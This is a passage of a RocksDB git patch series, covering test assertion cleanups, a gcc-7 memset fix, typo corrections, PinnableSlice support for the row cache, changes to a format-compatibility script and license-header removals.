Status::OK(); } virtual Status MergeCF(uint32_t column_family_id, const Slice& key, const Slice& value) override { - EXPECT_TRUE(false); + ADD_FAILURE(); return Status::OK(); } - virtual void LogData(const Slice& blob) override { EXPECT_TRUE(false); } + virtual void LogData(const Slice& blob) override { ADD_FAILURE(); } virtual bool Continue() override { return num_seen < 2; } } handler; diff --git a/table/mock_table.cc b/table/mock_table.cc index 9de04d69c60..7a2058bf9ec 100644 --- a/table/mock_table.cc +++ b/table/mock_table.cc @@ -137,7 +137,7 @@ void MockTableFactory::AssertLatestFile( ParseInternalKey(Slice(key), &ikey); std::cout << ikey.DebugString(false) << " -> " << value << std::endl; } - ASSERT_TRUE(false); + FAIL(); } } diff --git a/util/thread_local_test.cc b/util/thread_local_test.cc index 5806cf2653b..6fee5eaa574 100644 --- a/util/thread_local_test.cc +++ b/util/thread_local_test.cc @@ -569,7 +569,7 @@ TEST_F(ThreadLocalTest, DISABLED_MainThreadDiesFirst) { #ifndef ROCKSDB_LITE } catch (const std::system_error& ex) { std::cerr << "Start thread: " << ex.code() << std::endl; - ASSERT_TRUE(false); + FAIL(); } #endif // ROCKSDB_LITE } diff --git a/utilities/backupable/backupable_db_test.cc b/utilities/backupable/backupable_db_test.cc index d1a4bc60a79..be20a8d9b3d 100644 --- a/utilities/backupable/backupable_db_test.cc +++ b/utilities/backupable/backupable_db_test.cc @@ -101,7 +101,7 @@ class DummyDB : public StackableDB { virtual uint64_t LogNumber() const override { // what business do you have calling this method? - EXPECT_TRUE(false); + ADD_FAILURE(); return 0; } diff --git a/utilities/checkpoint/checkpoint_test.cc b/utilities/checkpoint/checkpoint_test.cc index 2872f3a426a..56c8c6e0505 100644 --- a/utilities/checkpoint/checkpoint_test.cc +++ b/utilities/checkpoint/checkpoint_test.cc @@ -372,7 +372,7 @@ TEST_F(CheckpointTest, CheckpointCFNoFlush) { rocksdb::SyncPoint::GetInstance()->SetCallBack( "DBImpl::BackgroundCallFlush:start", [&](void* arg) { // Flush should never trigger. - ASSERT_TRUE(false); + FAIL(); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); Checkpoint* checkpoint; diff --git a/utilities/lua/rocks_lua_test.cc b/utilities/lua/rocks_lua_test.cc index c075e032f7d..025acaf6d61 100644 --- a/utilities/lua/rocks_lua_test.cc +++ b/utilities/lua/rocks_lua_test.cc @@ -26,7 +26,7 @@ class StopOnErrorLogger : public Logger { virtual void Logv(const char* format, va_list ap) override { vfprintf(stderr, format, ap); fprintf(stderr, "\n"); - ASSERT_TRUE(false); + FAIL(); } }; diff --git a/utilities/persistent_cache/persistent_cache_test.cc b/utilities/persistent_cache/persistent_cache_test.cc index db9cf373fe7..5affc4085d0 100644 --- a/utilities/persistent_cache/persistent_cache_test.cc +++ b/utilities/persistent_cache/persistent_cache_test.cc @@ -372,7 +372,7 @@ void PersistentCacheDBTest::RunTest( options.table_factory.reset(NewBlockBasedTableFactory(table_options)); break; default: - ASSERT_TRUE(false); + FAIL(); } std::vector values; @@ -425,7 +425,7 @@ void PersistentCacheDBTest::RunTest( ASSERT_EQ(compressed_block_miss, 0); break; default: - ASSERT_TRUE(false); + FAIL(); } options.create_if_missing = true; diff --git a/utilities/transactions/transaction_test.cc b/utilities/transactions/transaction_test.cc index 90cec396b40..ce01388f8a8 100644 --- a/utilities/transactions/transaction_test.cc +++ b/utilities/transactions/transaction_test.cc @@ -242,7 +242,7 @@ TEST_P(TransactionTest, WaitingTxn) { // Column family is 1 or 0 (cfa). if (cf_iterator->first != 1 && cf_iterator->first != 0) { - ASSERT_FALSE(true); + FAIL(); } // The locked key is "foo" and is locked by txn1 ASSERT_EQ(cf_iterator->second.key, "foo"); @@ -253,7 +253,7 @@ TEST_P(TransactionTest, WaitingTxn) { // Column family is 0 (default) or 1. if (cf_iterator->first != 1 && cf_iterator->first != 0) { - ASSERT_FALSE(true); + FAIL(); } // The locked key is "foo" and is locked by txn1 ASSERT_EQ(cf_iterator->second.key, "foo"); @@ -1080,7 +1080,7 @@ TEST_P(TransactionTest, DISABLED_TwoPhaseMultiThreadTest) { env->SleepForMicroseconds(10); } } else { - ASSERT_TRUE(false); + FAIL(); } }); diff --git a/utilities/ttl/ttl_test.cc b/utilities/ttl/ttl_test.cc index 20300868807..586d0ce1f6c 100644 --- a/utilities/ttl/ttl_test.cc +++ b/utilities/ttl/ttl_test.cc @@ -131,7 +131,7 @@ class TtlTest : public testing::Test { batch.Delete(kv_it_->first); break; default: - ASSERT_TRUE(false); + FAIL(); } } db_ttl_->Write(wopts, &batch); @@ -184,12 +184,12 @@ class TtlTest : public testing::Test { if (ret == false || value_found == false) { fprintf(stderr, "KeyMayExist could not find key=%s in the database but" " should have\n", kv.first.c_str()); - ASSERT_TRUE(false); + FAIL(); } else if (val.compare(kv.second) != 0) { fprintf(stderr, " value for key=%s present in database is %s but" " should be %s\n", kv.first.c_str(), val.c_str(), kv.second.c_str()); - ASSERT_TRUE(false); + FAIL(); } } } @@ -239,18 +239,18 @@ class TtlTest : public testing::Test { } else { fprintf(stderr, "is present in db but was expected to be absent\n"); } - ASSERT_TRUE(false); + FAIL(); } else if (s.ok()) { if (test_compaction_change && v.compare(kNewValue_) != 0) { fprintf(stderr, " value for key=%s present in database is %s but " " should be %s\n", kv_it_->first.c_str(), v.c_str(), kNewValue_.c_str()); - ASSERT_TRUE(false); + FAIL(); } else if (!test_compaction_change && v.compare(kv_it_->second) !=0) { fprintf(stderr, " value for key=%s present in database is %s but " " should be %s\n", kv_it_->first.c_str(), v.c_str(), kv_it_->second.c_str()); - ASSERT_TRUE(false); + FAIL(); } } } From cbaab30449fdeea90e1d97721f1bbc25681e5e35 Mon Sep 17 00:00:00 2001 From: Daniel Black Date: Mon, 17 Jul 2017 10:33:12 -0700 Subject: [PATCH 005/205] table/block.h: change memset MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Summary: In gcc-7 the following is an error identified by -Werror=class-memaccess In file included from ./table/get_context.h:14:0, from db/version_set.cc:43: ./table/block.h: In constructor ‘rocksdb::BlockReadAmpBitmap::BlockReadAmpBitmap(size_t, size_t, rocksdb::Statistics*)’: ./table/block.h:73:53: error: ‘void* memset(void*, int, size_t)’ clearing an object of type ‘struct std::atomic’ with no trivial copy-assignment; use value-initialization instead [-Werror=class-memaccess] memset(bitmap_, 0, bitmap_size * kBytesPersEntry); ^ In file included from ./db/version_set.h:23:0, from db/version_set.cc:12: /toolchain/include/c++/8.0.0/atomic:684:12: note: ‘struct std::atomic’ declared here struct atomic : __atomic_base ^~~~~~~~~~~~~~~~~~~~ As a solution the default initializer can be applied in list context. Signed-off-by: Daniel Black Closes https://github.com/facebook/rocksdb/pull/2561 Differential Revision: D5398714 Pulled By: siying fbshipit-source-id: d883fb88ec7535eee60d551038fe91f14488be36 --- table/block.h | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/table/block.h b/table/block.h index 044e076626d..59dc1674337 100644 --- a/table/block.h +++ b/table/block.h @@ -67,8 +67,7 @@ class BlockReadAmpBitmap { size_t bitmap_size = (num_bits_needed - 1) / kBitsPerEntry + 1; // Create bitmap and set all the bits to 0 - bitmap_ = new std::atomic[bitmap_size]; - memset(bitmap_, 0, bitmap_size * kBytesPersEntry); + bitmap_ = new std::atomic[bitmap_size](); RecordTick(GetStatistics(), READ_AMP_TOTAL_READ_BYTES, block_size); } From b2dd192fed1efae9a96a869f5d8b4f559726a41d Mon Sep 17 00:00:00 2001 From: Chris Lamb Date: Mon, 17 Jul 2017 11:17:05 -0700 Subject: [PATCH 006/205] tools/write_stress.cc: Correct "1204" typos. Summary: Should be 1024, obviously :) Closes https://github.com/facebook/rocksdb/pull/2592 Differential Revision: D5435269 Pulled By: ajkr fbshipit-source-id: c59338a3900798a4733f0b205e534f21215cf049 --- tools/write_stress.cc | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/tools/write_stress.cc b/tools/write_stress.cc index 597e93798c6..e5e4204a8d8 100644 --- a/tools/write_stress.cc +++ b/tools/write_stress.cc @@ -135,8 +135,8 @@ class WriteStress { // compactions options.create_if_missing = true; options.write_buffer_size = 256 * 1024; // 256k - options.max_bytes_for_level_base = 1 * 1024 * 1204; // 1MB - options.target_file_size_base = 100 * 1204; // 100k + options.max_bytes_for_level_base = 1 * 1024 * 1024; // 1MB + options.target_file_size_base = 100 * 1024; // 100k options.max_write_buffer_number = 16; options.max_background_compactions = 16; options.max_background_flushes = 16; From 00464a3140ea88e9e3575407cae14259aa779b8c Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Mon, 17 Jul 2017 14:51:19 -0700 Subject: [PATCH 007/205] Fix column_family_test with LITE build Summary: Fix column_family_test with LITE build. I need this patch to fix 5.6 branch. Closes https://github.com/facebook/rocksdb/pull/2597 Differential Revision: D5437171 Pulled By: yiwu-arbug fbshipit-source-id: 88b9dc5925a6b47af10c1b41bc5b07c4251a84b5 --- db/column_family_test.cc | 2 ++ 1 file changed, 2 insertions(+) diff --git a/db/column_family_test.cc b/db/column_family_test.cc index 0d5f2dcf232..88786d469d5 100644 --- a/db/column_family_test.cc +++ b/db/column_family_test.cc @@ -521,6 +521,7 @@ TEST_F(ColumnFamilyTest, DontReuseColumnFamilyID) { } } +#ifndef ROCKSDB_LITE TEST_F(ColumnFamilyTest, CreateCFRaceWithGetAggProperty) { Open(); @@ -542,6 +543,7 @@ TEST_F(ColumnFamilyTest, CreateCFRaceWithGetAggProperty) { rocksdb::SyncPoint::GetInstance()->DisableProcessing(); } +#endif // !ROCKSDB_LITE class FlushEmptyCFTestWithParam : public ColumnFamilyTest, public testing::WithParamInterface { From 0655b585820dbc93b50fe1bdb3bc2d7d50047c95 Mon Sep 17 00:00:00 2001 From: Sushma Devendrappa Date: Mon, 17 Jul 2017 14:53:15 -0700 Subject: [PATCH 008/205] enable PinnableSlice for RowCache Summary: This patch enables using PinnableSlice for RowCache, changes include not releasing the cache handle immediately after lookup in TableCache::Get, instead pass a Cleanble function which does Cache::RleaseHandle. Closes https://github.com/facebook/rocksdb/pull/2492 Differential Revision: D5316216 Pulled By: maysamyabandeh fbshipit-source-id: d2a684bd7e4ba73772f762e58a82b5f4fbd5d362 --- cache/lru_cache.cc | 24 +++++++++++++++++++++--- cache/lru_cache.h | 8 ++++++++ db/db_test.cc | 31 +++++++++++++++++++++++++++++++ db/db_test_util.cc | 7 +++++++ db/db_test_util.h | 2 ++ db/table_cache.cc | 21 +++++++++++++++++++-- include/rocksdb/cleanable.h | 2 +- table/get_context.cc | 5 +++-- table/get_context.h | 3 ++- 9 files changed, 94 insertions(+), 9 deletions(-) diff --git a/cache/lru_cache.cc b/cache/lru_cache.cc index b201d81a4da..2a4c0f77a08 100644 --- a/cache/lru_cache.cc +++ b/cache/lru_cache.cc @@ -157,6 +157,16 @@ void LRUCacheShard::TEST_GetLRUList(LRUHandle** lru, LRUHandle** lru_low_pri) { *lru_low_pri = lru_low_pri_; } +size_t LRUCacheShard::TEST_GetLRUSize() { + LRUHandle* lru_handle = lru_.next; + size_t lru_size = 0; + while (lru_handle != &lru_) { + lru_size++; + lru_handle = lru_handle->next; + } + return lru_size; +} + void LRUCacheShard::LRU_Remove(LRUHandle* e) { assert(e->next != nullptr); assert(e->prev != nullptr); @@ -438,11 +448,11 @@ std::string LRUCacheShard::GetPrintableOptions() const { LRUCache::LRUCache(size_t capacity, int num_shard_bits, bool strict_capacity_limit, double high_pri_pool_ratio) : ShardedCache(capacity, num_shard_bits, strict_capacity_limit) { - int num_shards = 1 << num_shard_bits; - shards_ = new LRUCacheShard[num_shards]; + num_shards_ = 1 << num_shard_bits; + shards_ = new LRUCacheShard[num_shards_]; SetCapacity(capacity); SetStrictCapacityLimit(strict_capacity_limit); - for (int i = 0; i < num_shards; i++) { + for (int i = 0; i < num_shards_; i++) { shards_[i].SetHighPriorityPoolRatio(high_pri_pool_ratio); } } @@ -471,6 +481,14 @@ uint32_t LRUCache::GetHash(Handle* handle) const { void LRUCache::DisownData() { shards_ = nullptr; } +size_t LRUCache::TEST_GetLRUSize() { + size_t lru_size_of_all_shards = 0; + for (int i = 0; i < num_shards_; i++) { + lru_size_of_all_shards += shards_[i].TEST_GetLRUSize(); + } + return lru_size_of_all_shards; +} + std::shared_ptr NewLRUCache(size_t capacity, int num_shard_bits, bool strict_capacity_limit, double high_pri_pool_ratio) { diff --git a/cache/lru_cache.h b/cache/lru_cache.h index 4b6a9f2fec3..5fbe0f26459 100644 --- a/cache/lru_cache.h +++ b/cache/lru_cache.h @@ -198,6 +198,10 @@ class LRUCacheShard : public CacheShard { void TEST_GetLRUList(LRUHandle** lru, LRUHandle** lru_low_pri); + // Retrieves number of elements in LRU, for unit test purpose only + // not threadsafe + size_t TEST_GetLRUSize(); + private: void LRU_Remove(LRUHandle* e); void LRU_Insert(LRUHandle* e); @@ -267,8 +271,12 @@ class LRUCache : public ShardedCache { virtual uint32_t GetHash(Handle* handle) const override; virtual void DisownData() override; + // Retrieves number of elements in LRU, for unit test purpose only + size_t TEST_GetLRUSize(); + private: LRUCacheShard* shards_; + int num_shards_ = 0; }; } // namespace rocksdb diff --git a/db/db_test.cc b/db/db_test.cc index 70f54250ba9..e9840faa042 100644 --- a/db/db_test.cc +++ b/db/db_test.cc @@ -23,6 +23,7 @@ #include #endif +#include "cache/lru_cache.h" #include "db/db_impl.h" #include "db/db_test_util.h" #include "db/dbformat.h" @@ -5320,6 +5321,36 @@ TEST_F(DBTest, RowCache) { ASSERT_EQ(TestGetTickerCount(options, ROW_CACHE_HIT), 1); ASSERT_EQ(TestGetTickerCount(options, ROW_CACHE_MISS), 1); } + +TEST_F(DBTest, PinnableSliceAndRowCache) { + Options options = CurrentOptions(); + options.statistics = rocksdb::CreateDBStatistics(); + options.row_cache = NewLRUCache(8192); + DestroyAndReopen(options); + + ASSERT_OK(Put("foo", "bar")); + ASSERT_OK(Flush()); + + ASSERT_EQ(Get("foo"), "bar"); + ASSERT_EQ( + reinterpret_cast(options.row_cache.get())->TEST_GetLRUSize(), + 1); + + { + PinnableSlice pin_slice; + ASSERT_EQ(Get("foo", &pin_slice), Status::OK()); + ASSERT_EQ(pin_slice.ToString(), "bar"); + // Entry is already in cache, lookup will remove the element from lru + ASSERT_EQ( + reinterpret_cast(options.row_cache.get())->TEST_GetLRUSize(), + 0); + } + // After PinnableSlice destruction element is added back in LRU + ASSERT_EQ( + reinterpret_cast(options.row_cache.get())->TEST_GetLRUSize(), + 1); +} + #endif // ROCKSDB_LITE TEST_F(DBTest, DeletingOldWalAfterDrop) { diff --git a/db/db_test_util.cc b/db/db_test_util.cc index 7de6cff3e7a..5ca4b19a253 100644 --- a/db/db_test_util.cc +++ b/db/db_test_util.cc @@ -686,6 +686,13 @@ std::string DBTestBase::Get(int cf, const std::string& k, return result; } +Status DBTestBase::Get(const std::string& k, PinnableSlice* v) { + ReadOptions options; + options.verify_checksums = true; + Status s = dbfull()->Get(options, dbfull()->DefaultColumnFamily(), k, v); + return s; +} + uint64_t DBTestBase::GetNumSnapshots() { uint64_t int_num; EXPECT_TRUE(dbfull()->GetIntProperty("rocksdb.num-snapshots", &int_num)); diff --git a/db/db_test_util.h b/db/db_test_util.h index 5fb3f0c81b7..cd1265e21f1 100644 --- a/db/db_test_util.h +++ b/db/db_test_util.h @@ -803,6 +803,8 @@ class DBTestBase : public testing::Test { std::string Get(int cf, const std::string& k, const Snapshot* snapshot = nullptr); + Status Get(const std::string& k, PinnableSlice* v); + uint64_t GetNumSnapshots(); uint64_t GetTimeOldestSnapshots(); diff --git a/db/table_cache.cc b/db/table_cache.cc index 398556a08f9..4dc56935fbc 100644 --- a/db/table_cache.cc +++ b/db/table_cache.cc @@ -311,6 +311,7 @@ Status TableCache::Get(const ReadOptions& options, #ifndef ROCKSDB_LITE IterKey row_cache_key; std::string row_cache_entry_buffer; + // Check row cache if enabled. Since row cache does not currently store // sequence numbers, we cannot use it if we need to fetch the sequence. if (ioptions_.row_cache && !get_context->NeedToReadSequence()) { @@ -334,10 +335,26 @@ Status TableCache::Get(const ReadOptions& options, if (auto row_handle = ioptions_.row_cache->Lookup(row_cache_key.GetUserKey())) { + // Cleanable routine to release the cache entry + Cleanable value_pinner; + auto release_cache_entry_func = [](void* cache_to_clean, + void* cache_handle) { + ((Cache*)cache_to_clean)->Release((Cache::Handle*)cache_handle); + }; auto found_row_cache_entry = static_cast( ioptions_.row_cache->Value(row_handle)); - replayGetContextLog(*found_row_cache_entry, user_key, get_context); - ioptions_.row_cache->Release(row_handle); + // If it comes here value is located on the cache. + // found_row_cache_entry points to the value on cache, + // and value_pinner has cleanup procedure for the cached entry. + // After replayGetContextLog() returns, get_context.pinnable_slice_ + // will point to cache entry buffer (or a copy based on that) and + // cleanup routine under value_pinner will be delegated to + // get_context.pinnable_slice_. Cache entry is released when + // get_context.pinnable_slice_ is reset. + value_pinner.RegisterCleanup(release_cache_entry_func, + ioptions_.row_cache.get(), row_handle); + replayGetContextLog(*found_row_cache_entry, user_key, get_context, + &value_pinner); RecordTick(ioptions_.statistics, ROW_CACHE_HIT); done = true; } else { diff --git a/include/rocksdb/cleanable.h b/include/rocksdb/cleanable.h index ecc172b44bb..0f45c7108ad 100644 --- a/include/rocksdb/cleanable.h +++ b/include/rocksdb/cleanable.h @@ -33,7 +33,7 @@ class Cleanable { typedef void (*CleanupFunction)(void* arg1, void* arg2); void RegisterCleanup(CleanupFunction function, void* arg1, void* arg2); void DelegateCleanupsTo(Cleanable* other); - // DoCkeanup and also resets the pointers for reuse + // DoCleanup and also resets the pointers for reuse inline void Reset() { DoCleanup(); cleanup_.function = nullptr; diff --git a/table/get_context.cc b/table/get_context.cc index 2b49eba6abd..0d688fe4609 100644 --- a/table/get_context.cc +++ b/table/get_context.cc @@ -180,7 +180,7 @@ bool GetContext::SaveValue(const ParsedInternalKey& parsed_key, } void replayGetContextLog(const Slice& replay_log, const Slice& user_key, - GetContext* get_context) { + GetContext* get_context, Cleanable* value_pinner) { #ifndef ROCKSDB_LITE Slice s = replay_log; while (s.size()) { @@ -194,7 +194,8 @@ void replayGetContextLog(const Slice& replay_log, const Slice& user_key, // Since SequenceNumber is not stored and unknown, we will use // kMaxSequenceNumber. get_context->SaveValue( - ParsedInternalKey(user_key, kMaxSequenceNumber, type), value, nullptr); + ParsedInternalKey(user_key, kMaxSequenceNumber, type), value, + value_pinner); } #else // ROCKSDB_LITE assert(false); diff --git a/table/get_context.h b/table/get_context.h index ee8a3beab9f..ac50680b645 100644 --- a/table/get_context.h +++ b/table/get_context.h @@ -86,6 +86,7 @@ class GetContext { }; void replayGetContextLog(const Slice& replay_log, const Slice& user_key, - GetContext* get_context); + GetContext* get_context, + Cleanable* value_pinner = nullptr); } // namespace rocksdb From 7ac184c6d794fc77fe75e57686aaa177059c7560 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Mon, 17 Jul 2017 14:54:40 -0700 Subject: [PATCH 009/205] Revert cmake -DNDEBUG for non-MSVC Summary: Unfortunately we can't use -DNDEBUG yet since we don't properly exclude the test libraries/executables from the non-debug builds on non-MSVC platforms. Previously this was failing on Linux for every build type except `CMAKE_BUILD_TYPE=Debug`. Reverts a48a62d Closes https://github.com/facebook/rocksdb/pull/2595 Differential Revision: D5436182 Pulled By: ajkr fbshipit-source-id: 062f07cc9ce06a073b66054722b27bac1890dca3 --- CMakeLists.txt | 1 - 1 file changed, 1 deletion(-) diff --git a/CMakeLists.txt b/CMakeLists.txt index 1d0ad1cb06e..2d56c8d7daf 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -174,7 +174,6 @@ else() endif() set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -std=c++11") if(NOT CMAKE_BUILD_TYPE STREQUAL "Debug") - add_definitions(-DNDEBUG) set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -O2 -fno-omit-frame-pointer") include(CheckCXXCompilerFlag) CHECK_CXX_COMPILER_FLAG("-momit-leaf-frame-pointer" HAVE_OMIT_LEAF_FRAME_POINTER) From 0c03a7f17d253839d1f0659798d98d1ac311218a Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Mon, 17 Jul 2017 19:35:23 -0700 Subject: [PATCH 010/205] set the remote for git checkout Summary: This will fix the error: "error: pathspec '2.2.fb.branch' did not match any file(s) known to git." Tested by manually sshing to sandcastle and running the command. Closes https://github.com/facebook/rocksdb/pull/2599 Differential Revision: D5441130 Pulled By: maysamyabandeh fbshipit-source-id: a22fd6a52221471bafbba8990394b499535e5812 --- tools/check_format_compatible.sh | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/tools/check_format_compatible.sh b/tools/check_format_compatible.sh index 300aaf08958..d3d07d00b3a 100755 --- a/tools/check_format_compatible.sh +++ b/tools/check_format_compatible.sh @@ -76,7 +76,7 @@ https_proxy="fwdproxy:8080" git fetch github_origin for checkout_obj in "${checkout_objs[@]}" do echo == Generating DB from "$checkout_obj" ... - git checkout $checkout_obj + https_proxy="fwdproxy:8080" git checkout github_origin/$checkout_obj -b $checkout_obj make clean make ldb -j32 generate_db $input_data_path $test_dir/$checkout_obj @@ -85,7 +85,7 @@ done checkout_flag=${1:-"master"} echo == Building $checkout_flag debug -git checkout $checkout_flag +https_proxy="fwdproxy:8080" git checkout github_origin/$checkout_flag -b $checkout_flag make clean make ldb -j32 compare_base_db_dir=$test_dir"/base_db_dir" @@ -101,7 +101,7 @@ done for checkout_obj in "${forward_compatible_checkout_objs[@]}" do echo == Build "$checkout_obj" and try to open DB generated using $checkout_flag... - git checkout $checkout_obj + https_proxy="fwdproxy:8080" git checkout github_origin/$checkout_obj -b $checkout_obj make clean make ldb -j32 compare_db $test_dir/$checkout_obj $compare_base_db_dir forward_${checkout_obj}_dump.txt 0 From ddb22ac59c0fe54636e89639f687fe3625b0144d Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Tue, 18 Jul 2017 08:16:58 -0700 Subject: [PATCH 011/205] avoid collision with master branch in check format Summary: The new local branch specified with -b cannot be called master. Use tmp prefix to avoid name collision. Closes https://github.com/facebook/rocksdb/pull/2600 Differential Revision: D5442944 Pulled By: maysamyabandeh fbshipit-source-id: 4a623d9b21d6cc01bee812b2799790315bdf5f6e --- tools/check_format_compatible.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/check_format_compatible.sh b/tools/check_format_compatible.sh index d3d07d00b3a..820fb42c5e9 100755 --- a/tools/check_format_compatible.sh +++ b/tools/check_format_compatible.sh @@ -85,7 +85,7 @@ done checkout_flag=${1:-"master"} echo == Building $checkout_flag debug -https_proxy="fwdproxy:8080" git checkout github_origin/$checkout_flag -b $checkout_flag +https_proxy="fwdproxy:8080" git checkout github_origin/$checkout_flag -b tmp-$checkout_flag make clean make ldb -j32 compare_base_db_dir=$test_dir"/base_db_dir" From 2f375154eadfa7eec0b624c3a0269d88c0b33a87 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Tue, 18 Jul 2017 10:29:36 -0700 Subject: [PATCH 012/205] checkout local branch in check_format_compatible.sh Summary: For forward_compatible_checkout_objs the local branch is already created in previous step. This patch avoid recreating it. This should address "fatal: A branch named '3.10.fb' already exists." errors. Closes https://github.com/facebook/rocksdb/pull/2606 Differential Revision: D5443786 Pulled By: maysamyabandeh fbshipit-source-id: 69d5a67b87677429cf36e3a467bd114d341f3b9c --- tools/check_format_compatible.sh | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/tools/check_format_compatible.sh b/tools/check_format_compatible.sh index 820fb42c5e9..2f3805e5ab2 100755 --- a/tools/check_format_compatible.sh +++ b/tools/check_format_compatible.sh @@ -41,8 +41,9 @@ with open('${input_data[$i]}', 'w') as f: EOF done -declare -a checkout_objs=("2.2.fb.branch" "2.3.fb.branch" "2.4.fb.branch" "2.5.fb.branch" "2.6.fb.branch" "2.7.fb.branch" "2.8.1.fb" "3.0.fb.branch" "3.1.fb" "3.2.fb" "3.3.fb" "3.4.fb" "3.5.fb" "3.6.fb" "3.7.fb" "3.8.fb" "3.9.fb" "3.10.fb" "3.11.fb" "3.12.fb" "3.13.fb" "4.0.fb" "4.1.fb" "4.2.fb" "4.3.fb" "4.4.fb" "4.5.fb" "4.6.fb" "4.7.fb" "4.8.fb" "4.9.fb" "4.10.fb" "4.11.fb" "4.12.fb" "4.13.fb" "5.0.fb" "5.1.fb" "5.2.fb" "5.3.fb" "5.4.fb" "5.5.fb" "5.6.fb") +declare -a backward_compatible_checkout_objs=("2.2.fb.branch" "2.3.fb.branch" "2.4.fb.branch" "2.5.fb.branch" "2.6.fb.branch" "2.7.fb.branch" "2.8.1.fb" "3.0.fb.branch" "3.1.fb" "3.2.fb" "3.3.fb" "3.4.fb" "3.5.fb" "3.6.fb" "3.7.fb" "3.8.fb" "3.9.fb") declare -a forward_compatible_checkout_objs=("3.10.fb" "3.11.fb" "3.12.fb" "3.13.fb" "4.0.fb" "4.1.fb" "4.2.fb" "4.3.fb" "4.4.fb" "4.5.fb" "4.6.fb" "4.7.fb" "4.8.fb" "4.9.fb" "4.10.fb" "4.11.fb" "4.12.fb" "4.13.fb" "5.0.fb" "5.1.fb" "5.2.fb" "5.3.fb" "5.4.fb" "5.5.fb" "5.6.fb") +declare -a checkout_objs=(${backward_compatible_checkout_objs[@]} ${forward_compatible_checkout_objs[@]}) generate_db() { @@ -101,7 +102,7 @@ done for checkout_obj in "${forward_compatible_checkout_objs[@]}" do echo == Build "$checkout_obj" and try to open DB generated using $checkout_flag... - https_proxy="fwdproxy:8080" git checkout github_origin/$checkout_obj -b $checkout_obj + git checkout $checkout_obj make clean make ldb -j32 compare_db $test_dir/$checkout_obj $compare_base_db_dir forward_${checkout_obj}_dump.txt 0 From 33b1de82a7b0f0788cd7023e138e733925b11fef Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Tue, 18 Jul 2017 10:57:10 -0700 Subject: [PATCH 013/205] Remove format compatibility hack Summary: We don't need this format compatibility hack anymore. We should remove it to make things simpler. Closes https://github.com/facebook/rocksdb/pull/2607 Differential Revision: D5444107 Pulled By: siying fbshipit-source-id: 7ef587dd0cacfc15a4083a137adba8e6bfddac7e --- build_tools/rocksdb-lego-determinator | 34 +-------------------------- 1 file changed, 1 insertion(+), 33 deletions(-) diff --git a/build_tools/rocksdb-lego-determinator b/build_tools/rocksdb-lego-determinator index 044c3df354c..09e79f376a8 100755 --- a/build_tools/rocksdb-lego-determinator +++ b/build_tools/rocksdb-lego-determinator @@ -583,39 +583,7 @@ run_format_compatible() rm -rf /dev/shm/rocksdb mkdir /dev/shm/rocksdb - echo ' - if [ -e "build_tools/build_detect_platform" ] - then - sed "s/tcmalloc/nothingnothingnothing/g" build_tools/build_detect_platform > $TEST_TMPDIR/temp_build_file - rm -rf build_tools/build_detect_platform - cp $TEST_TMPDIR/temp_build_file build_tools/build_detect_platform - chmod +x build_tools/build_detect_platform - fi - - if [ -e "build_detect_platform" ] - then - sed "s/tcmalloc/nothingnothingnothing/g" build_detect_platform > $TEST_TMPDIR/temp_build_file - rm -rf build_detect_platform - cp $TEST_TMPDIR/temp_build_file build_detect_platform - chmod +x build_detect_platform - fi - - make ldb -j32 - - if [ -e "build_detect_platform" ] - then - git checkout -- build_detect_platform - fi - - if [ -e "build_tools/build_detect_platform" ] - then - git checkout -- build_tools/build_detect_platform - fi - ' > temp_build_ldb.sh - - sed "s/make ldb -j32/source temp_build_ldb.sh/g" tools/check_format_compatible.sh > tools/temp_check_format_compatible.sh - chmod +x tools/temp_check_format_compatible.sh - tools/temp_check_format_compatible.sh + tools/check_format_compatible.sh } FORMAT_COMPATIBLE_COMMANDS="[ From ae28634e9f7aae8b06a38542685c32ba84fb7485 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Tue, 18 Jul 2017 11:46:31 -0700 Subject: [PATCH 014/205] Remove some left-over BSD headers Summary: Closes https://github.com/facebook/rocksdb/pull/2608 Differential Revision: D5444797 Pulled By: siying fbshipit-source-id: 690581d03f37822e059a16085088e8e2d8a45016 --- db/compaction_iterator.cc | 2 -- db/compaction_iterator.h | 2 -- db/comparator_db_test.cc | 2 -- db/convenience.cc | 3 --- db/db_filesnapshot.cc | 3 --- db/plain_table_db_test.cc | 2 -- table/mock_table.cc | 2 -- table/mock_table.h | 2 -- 8 files changed, 18 deletions(-) diff --git a/db/compaction_iterator.cc b/db/compaction_iterator.cc index c59e734ca26..08ae1973409 100644 --- a/db/compaction_iterator.cc +++ b/db/compaction_iterator.cc @@ -1,5 +1,3 @@ -// Use of this source code is governed by a BSD-style license that can be -// found in the LICENSE file. See the AUTHORS file for names of contributors. // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License diff --git a/db/compaction_iterator.h b/db/compaction_iterator.h index 54c4bc249c8..cad23866699 100644 --- a/db/compaction_iterator.h +++ b/db/compaction_iterator.h @@ -1,5 +1,3 @@ -// Use of this source code is governed by a BSD-style license that can be -// found in the LICENSE file. See the AUTHORS file for names of contributors. // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // COPYING file in the root directory) and Apache 2.0 License diff --git a/db/comparator_db_test.cc b/db/comparator_db_test.cc index 8ba800f22f9..28a2a5658e7 100644 --- a/db/comparator_db_test.cc +++ b/db/comparator_db_test.cc @@ -1,5 +1,3 @@ -// Use of this source code is governed by a BSD-style license that can be -// found in the LICENSE file. See the AUTHORS file for names of contributors. // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. // This source code is licensed under both the GPLv2 (found in the // 